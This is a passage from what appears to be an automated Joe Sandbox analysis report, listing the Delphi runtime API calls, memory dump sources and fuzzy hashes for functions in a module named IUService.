                                                                                                                                              • Part of subcall function 5002D778: @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,00000000,?,?), ref: 5002D84B
                                                                                                                                              • Part of subcall function 5002D778: @System@@RaiseExcept$qqrv.RTL120(00000000,00000000,?,?), ref: 5002D850
                                                                                                                                              • Part of subcall function 5002D778: @System@@DynArrayLength$qqrv.RTL120(?,?), ref: 5002D85A
                                                                                                                                              • Part of subcall function 5002D778: @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,00000000,?,?), ref: 5002D885
                                                                                                                                              • Part of subcall function 5002D778: @System@@RaiseExcept$qqrv.RTL120(00000000,00000000,?,?), ref: 5002D88A
                                                                                                                                              • Part of subcall function 5002D778: @Sysutils@TEncoding@GetByteCount$qqrx24System@%DynamicArray$tb%ii.RTL120(5002D771,00000000,00000000,?,?), ref: 5002D898
                                                                                                                                              • Part of subcall function 5002D778: @Sysutils@Exception@$bctr$qqrp20System@TResStringRec.RTL120(5002D771,00000000,00000000,?,?), ref: 5002D8B3
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$System@@Sysutils@$Exception@$bctr$qqrp20String$ArrayExcept$qqrvRaise$DynamicLength$qqrvSystem@%$Encoding@Recpx14Recxi$ByteCount$qqrx24$Array$tb%ii$Array$tb%Array$tb%iir25Array$tuc%iBytes$qqrx24Length$qqrrpvpvipi
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2407772116-0
                                                                                                                                            APIs
                                                                                                                                            • VariantInit.OLEAUT32(00000000), ref: 50032999
                                                                                                                                            • @Variants@@VarCopy$qqrr8TVarDatarx8TVarData.RTL120(00000000,500329E3,?,00000000,?), ref: 500329B1
                                                                                                                                            • @Variants@@VarToInt64$qqrrx8TVarData.RTL120(?,00000000,?), ref: 500329C2
                                                                                                                                            • @Variants@@VarClear$qqrr8TVarData.RTL120(500329EA), ref: 500329DD
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: DataVariants@@$Clear$qqrr8Copy$qqrr8Datarx8InitInt64$qqrrx8Variant
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 982248214-0
                                                                                                                                            APIs
                                                                                                                                            • @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 5002C22A
                                                                                                                                            • @System@TObject@$bctr$qqrv.RTL120(?,?,?,5002C1FA), ref: 5002C239
                                                                                                                                            • @Sysutils@TStringBuilder@set_Capacity$qqri.RTL120(?,?,?,5002C1FA), ref: 5002C249
                                                                                                                                            • @System@@AfterConstruction$qqrp14System@TObject.RTL120(?,?,?,5002C1FA), ref: 5002C259
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$System@@$AfterBuilder@set_Capacity$qqriClassClassoConstruction$qqrp14Create$qqrp17MetaObjectObject@$bctr$qqrvStringSysutils@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1727176548-0
                                                                                                                                            APIs
                                                                                                                                            • @Sysutils@TStringBuilder@get_Capacity$qqrv.RTL120(?,?,5002CECE), ref: 5002C366
                                                                                                                                              • Part of subcall function 5002C39C: @System@@DynArrayLength$qqrv.RTL120(5002CEC3), ref: 5002C39F
                                                                                                                                            • @Sysutils@TStringBuilder@get_MaxCapacity$qqrv.RTL120(?,?,5002CECE), ref: 5002C37C
                                                                                                                                            • @Sysutils@TStringBuilder@get_MaxCapacity$qqrv.RTL120(?,?,5002CECE), ref: 5002C387
                                                                                                                                            • @Sysutils@TStringBuilder@set_Capacity$qqri.RTL120(?,?,5002CECE), ref: 5002C392
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: StringSysutils@$Builder@get_Capacity$qqrv$ArrayBuilder@set_Capacity$qqriLength$qqrvSystem@@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1916226493-0
                                                                                                                                            APIs
                                                                                                                                            • @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000000,50030756,?,00000000), ref: 50030727
                                                                                                                                              • Part of subcall function 5000D5D0: @System@FindResourceHInstance$qqrui.RTL120(00010000,?,00001000), ref: 5000D60F
                                                                                                                                              • Part of subcall function 5000D5D0: LoadStringW.USER32(00000000,00010000,?,00001000), ref: 5000D615
                                                                                                                                              • Part of subcall function 5000D5D0: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120 ref: 5000D620
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrx20System@UnicodeString.RTL120(00000000,50030756,?,00000000), ref: 50030736
                                                                                                                                              • Part of subcall function 500265AC: @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 500265B6
                                                                                                                                              • Part of subcall function 500265AC: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,?,?,500122EB,5850026B,5850026B,5850026B,A850017A), ref: 500265C6
                                                                                                                                              • Part of subcall function 500265AC: @System@@AfterConstruction$qqrp14System@TObject.RTL120(?,?,?,500122EB,5850026B,5850026B,5850026B,A850017A), ref: 500265D1
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000000,50030756,?,00000000), ref: 5003073B
                                                                                                                                              • Part of subcall function 50007D94: @System@@RunError$qqruc.RTL120 ref: 50007D9D
                                                                                                                                              • Part of subcall function 50007D94: @System@RaiseList$qqrv.RTL120(?,?,?,00000007,?,?,?,?,?,?,?,?,0EEDFADE,00000001,00000007), ref: 50007DDB
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$System@@$StringUnicode$LoadRaise$AfterAsg$qqrr20CharClassClassoConstruction$qqrp14Create$qqrp17Error$qqrucExcept$qqrvException@$bctr$qqrx20FindFromInstance$qqruiLen$qqrr20List$qqrvMetaObjectResourceString$qqrp20StringpbiStringx20Sysutils@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 336146123-0
                                                                                                                                            • Opcode ID: 9adbf1e102df835a60131fb93e77b0ad724821b13bdac4217d23f11bd0adb454
                                                                                                                                            • Instruction ID: 7b96b98e3e44b9784b1c23c869ab84a684675366666c903ca15437983a838fae
                                                                                                                                            • Opcode Fuzzy Hash: 9adbf1e102df835a60131fb93e77b0ad724821b13bdac4217d23f11bd0adb454
                                                                                                                                            • Instruction Fuzzy Hash: 12E09234505588EFEB22DB90FD629AAB3A9EB59700FE10573F90083651DA317E00D9A0
                                                                                                                                            APIs
                                                                                                                                            • @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000000,50030846,?,00000000), ref: 50030817
                                                                                                                                              • Part of subcall function 5000D5D0: @System@FindResourceHInstance$qqrui.RTL120(00010000,?,00001000), ref: 5000D60F
                                                                                                                                              • Part of subcall function 5000D5D0: LoadStringW.USER32(00000000,00010000,?,00001000), ref: 5000D615
                                                                                                                                              • Part of subcall function 5000D5D0: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120 ref: 5000D620
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrx20System@UnicodeString.RTL120(00000000,50030846,?,00000000), ref: 50030826
                                                                                                                                              • Part of subcall function 500265AC: @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 500265B6
                                                                                                                                              • Part of subcall function 500265AC: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,?,?,500122EB,5850026B,5850026B,5850026B,A850017A), ref: 500265C6
                                                                                                                                              • Part of subcall function 500265AC: @System@@AfterConstruction$qqrp14System@TObject.RTL120(?,?,?,500122EB,5850026B,5850026B,5850026B,A850017A), ref: 500265D1
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000000,50030846,?,00000000), ref: 5003082B
                                                                                                                                              • Part of subcall function 50007D94: @System@@RunError$qqruc.RTL120 ref: 50007D9D
                                                                                                                                              • Part of subcall function 50007D94: @System@RaiseList$qqrv.RTL120(?,?,?,00000007,?,?,?,?,?,?,?,?,0EEDFADE,00000001,00000007), ref: 50007DDB
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$System@@$StringUnicode$LoadRaise$AfterAsg$qqrr20CharClassClassoConstruction$qqrp14Create$qqrp17Error$qqrucExcept$qqrvException@$bctr$qqrx20FindFromInstance$qqruiLen$qqrr20List$qqrvMetaObjectResourceString$qqrp20StringpbiStringx20Sysutils@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 336146123-0
                                                                                                                                            • Opcode ID: 6f18f2c73f444128e5a733a293f07d3ed2a7dced5cd209cccd8cd0d28c8d86e9
                                                                                                                                            • Instruction ID: 0fd73ecdc63e3906adab3347c8ca8083b58c1d45574116356cda35ff769876bc
                                                                                                                                            • Opcode Fuzzy Hash: 6f18f2c73f444128e5a733a293f07d3ed2a7dced5cd209cccd8cd0d28c8d86e9
                                                                                                                                            • Instruction Fuzzy Hash: D5E09234105688EFEB11DFA1EE6296AB3A9EB94740FA10573F90482651DE316E00D990
                                                                                                                                            APIs
                                                                                                                                            • @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000000,5003089A,?,00000000), ref: 5003086B
                                                                                                                                              • Part of subcall function 5000D5D0: @System@FindResourceHInstance$qqrui.RTL120(00010000,?,00001000), ref: 5000D60F
                                                                                                                                              • Part of subcall function 5000D5D0: LoadStringW.USER32(00000000,00010000,?,00001000), ref: 5000D615
                                                                                                                                              • Part of subcall function 5000D5D0: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120 ref: 5000D620
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrx20System@UnicodeString.RTL120(00000000,5003089A,?,00000000), ref: 5003087A
                                                                                                                                              • Part of subcall function 500265AC: @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 500265B6
                                                                                                                                              • Part of subcall function 500265AC: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,?,?,500122EB,5850026B,5850026B,5850026B,A850017A), ref: 500265C6
                                                                                                                                              • Part of subcall function 500265AC: @System@@AfterConstruction$qqrp14System@TObject.RTL120(?,?,?,500122EB,5850026B,5850026B,5850026B,A850017A), ref: 500265D1
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000000,5003089A,?,00000000), ref: 5003087F
                                                                                                                                              • Part of subcall function 50007D94: @System@@RunError$qqruc.RTL120 ref: 50007D9D
                                                                                                                                              • Part of subcall function 50007D94: @System@RaiseList$qqrv.RTL120(?,?,?,00000007,?,?,?,?,?,?,?,?,0EEDFADE,00000001,00000007), ref: 50007DDB
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$System@@$StringUnicode$LoadRaise$AfterAsg$qqrr20CharClassClassoConstruction$qqrp14Create$qqrp17Error$qqrucExcept$qqrvException@$bctr$qqrx20FindFromInstance$qqruiLen$qqrr20List$qqrvMetaObjectResourceString$qqrp20StringpbiStringx20Sysutils@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 336146123-0
                                                                                                                                            • Opcode ID: 801a26064422de4bee8b03e7eabf7526823dfbc5163cdb4573ffbdd956c762c3
                                                                                                                                            • Instruction ID: 375d69ef3d01049e605aa9f8fdfeda863f1c380b39b0ffaf094c9cd922885603
                                                                                                                                            • Opcode Fuzzy Hash: 801a26064422de4bee8b03e7eabf7526823dfbc5163cdb4573ffbdd956c762c3
                                                                                                                                            • Instruction Fuzzy Hash: A7E09B34105684DFFB12DB94ED7399A73A8EB54700F9105B3F90142651DE356E00D990
                                                                                                                                            APIs
                                                                                                                                            • @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000000,50030A7E,?,00000000), ref: 50030A4F
                                                                                                                                              • Part of subcall function 5000D5D0: @System@FindResourceHInstance$qqrui.RTL120(00010000,?,00001000), ref: 5000D60F
                                                                                                                                              • Part of subcall function 5000D5D0: LoadStringW.USER32(00000000,00010000,?,00001000), ref: 5000D615
                                                                                                                                              • Part of subcall function 5000D5D0: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120 ref: 5000D620
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrx20System@UnicodeString.RTL120(00000000,50030A7E,?,00000000), ref: 50030A5E
                                                                                                                                              • Part of subcall function 500265AC: @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 500265B6
                                                                                                                                              • Part of subcall function 500265AC: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,?,?,500122EB,5850026B,5850026B,5850026B,A850017A), ref: 500265C6
                                                                                                                                              • Part of subcall function 500265AC: @System@@AfterConstruction$qqrp14System@TObject.RTL120(?,?,?,500122EB,5850026B,5850026B,5850026B,A850017A), ref: 500265D1
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000000,50030A7E,?,00000000), ref: 50030A63
                                                                                                                                              • Part of subcall function 50007D94: @System@@RunError$qqruc.RTL120 ref: 50007D9D
                                                                                                                                              • Part of subcall function 50007D94: @System@RaiseList$qqrv.RTL120(?,?,?,00000007,?,?,?,?,?,?,?,?,0EEDFADE,00000001,00000007), ref: 50007DDB
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$System@@$StringUnicode$LoadRaise$AfterAsg$qqrr20CharClassClassoConstruction$qqrp14Create$qqrp17Error$qqrucExcept$qqrvException@$bctr$qqrx20FindFromInstance$qqruiLen$qqrr20List$qqrvMetaObjectResourceString$qqrp20StringpbiStringx20Sysutils@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 336146123-0
                                                                                                                                            • Opcode ID: f1687f117a903241ffaa1fa5060f16201b683147ee7a1374503e745b60fd8754
                                                                                                                                            • Instruction ID: 7528d12fff5074f310ed779a2ab25226a40bb15e629f8c4203f1ec9f173bc9b7
                                                                                                                                            • Opcode Fuzzy Hash: f1687f117a903241ffaa1fa5060f16201b683147ee7a1374503e745b60fd8754
                                                                                                                                            • Instruction Fuzzy Hash: BDE0D834105A88EFEB12DBE0FD729AAB7B9EB59700F914577F90083651DF316E00D991
                                                                                                                                            APIs
                                                                                                                                            • Sleep.KERNEL32(00000000,50003885), ref: 50002142
                                                                                                                                            • Sleep.KERNEL32(0000000A,00000000,50003885), ref: 5000215B
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Sleep
                                                                                                                                            • String ID: LJP$LJP
                                                                                                                                            • API String ID: 3472027048-3339104776
                                                                                                                                            APIs
                                                                                                                                            • @System@SetInOutRes$qqri.RTL120 ref: 5000513C
                                                                                                                                            • DeleteFileW.KERNEL32(?), ref: 50005147
                                                                                                                                            • GetLastError.KERNEL32(?), ref: 50005150
                                                                                                                                            • @System@SetInOutRes$qqri.RTL120(?), ref: 50005155
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Res$qqriSystem@$DeleteErrorFileLast
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2381681663-0
                                                                                                                                            APIs
                                                                                                                                            • @System@@FillChar$qqrpvib.RTL120 ref: 50003A6A
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Char$qqrpvibFillSystem@@
                                                                                                                                            • String ID: <JP$jP
                                                                                                                                            • API String ID: 4121559260-1976356052
                                                                                                                                            APIs
                                                                                                                                            • @System@@FillChar$qqrpvib.RTL120 ref: 5000384A
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Char$qqrpvibFillSystem@@
                                                                                                                                            • String ID: <JP$jP
                                                                                                                                            • API String ID: 4121559260-1976356052
                                                                                                                                            APIs
                                                                                                                                            • @System@FPower10$qqrv.RTL120 ref: 50021606
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Power10$qqrvSystem@
                                                                                                                                            • String ID: +$-
                                                                                                                                            • API String ID: 140778524-2137968064
                                                                                                                                            APIs
                                                                                                                                            • @System@FPower10$qqrv.RTL120(00000000,00000000,?,00000000), ref: 5002148D
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Power10$qqrvSystem@
                                                                                                                                            • String ID: +$-
                                                                                                                                            • API String ID: 140778524-2137968064
                                                                                                                                            APIs
                                                                                                                                            • @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120(?,?,00000000,?,500046F0,00000000,5000471D,?,?,?,00000000), ref: 5000467A
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Length$qqrr20StringiSystem@System@@Unicode
                                                                                                                                            • String ID: $"
                                                                                                                                            • API String ID: 1238308113-3817095088
                                                                                                                                            • Opcode ID: 3740d5a8882292424296d33065260b11a727ea2989f92afca789f2fadf23aca0
                                                                                                                                            • Instruction ID: a4110a0b3ab76dcf93db08b7b91ce8b4ca9335338cd7ea686d5f75d583f17b04
                                                                                                                                            • Opcode Fuzzy Hash: 3740d5a8882292424296d33065260b11a727ea2989f92afca789f2fadf23aca0
                                                                                                                                            • Instruction Fuzzy Hash: B211E9C3E011A085F7B42700D8322E722E2EB93B517EA0356CC80CB656F2A34C91D55F
                                                                                                                                            APIs
                                                                                                                                            • @System@@ResetText$qqrr15System@TTextRec.RTL120(?,5000549E,?,500050BF), ref: 5000546C
                                                                                                                                            • @System@SetInOutRes$qqri.RTL120(?,5000549E,?,500050BF), ref: 50005485
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$Res$qqriResetSystem@@TextText$qqrr15
                                                                                                                                            • String ID: `@P
                                                                                                                                            • API String ID: 3749152163-4219215009
                                                                                                                                            • Opcode ID: 474c6b335946cc709f9bfe439fa6d2f0613b7dda503e967d2b86d165faebaa74
                                                                                                                                            • Instruction ID: 3488a2e08867437c2cb3a72290a42c38b3174c830ac736cddd9b2ab7f76a7471
                                                                                                                                            • Opcode Fuzzy Hash: 474c6b335946cc709f9bfe439fa6d2f0613b7dda503e967d2b86d165faebaa74
                                                                                                                                            • Instruction Fuzzy Hash: B8D05E897472D08ABB40AFF828F029495A05B48152B84D667FD84CB253E659CA549365